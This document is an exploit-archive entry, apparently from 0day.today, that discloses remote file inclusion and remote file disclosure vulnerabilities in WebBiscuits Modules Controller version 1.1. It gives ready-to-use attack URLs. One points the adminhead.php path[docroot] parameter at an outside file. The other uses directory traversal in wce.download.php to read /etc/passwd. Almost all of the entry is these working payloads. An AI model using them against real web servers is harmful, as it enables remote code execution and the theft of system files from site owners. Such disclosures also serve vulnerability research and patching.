id: 3858
date: 10/07/2008
title: WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Remote Vulnerabilities
author: GoLd_M
cves: 

======================================================================
WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Remote Vulnerabilities
======================================================================


WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Multiple Remote Vulnerabilities
Script : http://webbiscuits.com/download/all11.zip
I- Remote File Inclusion Vulnerability
http://xx.com/adminhead.php?path[docroot]=020.txt
And More Files ....
II- Remote File Disclosure Vulnerability
http://xx.com/faqsupport/wce.download.php?download=../../../../../../../../../../../../../etc/passwd



#  0day.today [2023-03-25]  #